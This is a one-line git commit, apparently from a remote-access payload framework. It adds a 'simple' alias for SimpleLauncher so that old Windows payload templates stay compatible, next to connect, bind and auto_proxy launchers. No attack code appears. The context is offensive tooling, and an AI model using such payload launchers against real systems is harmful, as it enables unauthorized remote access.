backward-compatibility of "simple" launcher for windows payloads

This commit is contained in:
n1nj4sec 2016-05-29 15:38:09 +02:00
parent 468fdea578
commit 1d5cd71510
1 changed files with 1 additions and 0 deletions

View File

@ -145,6 +145,7 @@ if scramblesuit:
}
launchers["connect"]=SimpleLauncher
launchers["simple"]=SimpleLauncher # keeped for backward-compatibility with old windows templates
launchers["auto_proxy"]=AutoProxyLauncher
launchers["bind"]=BindLauncher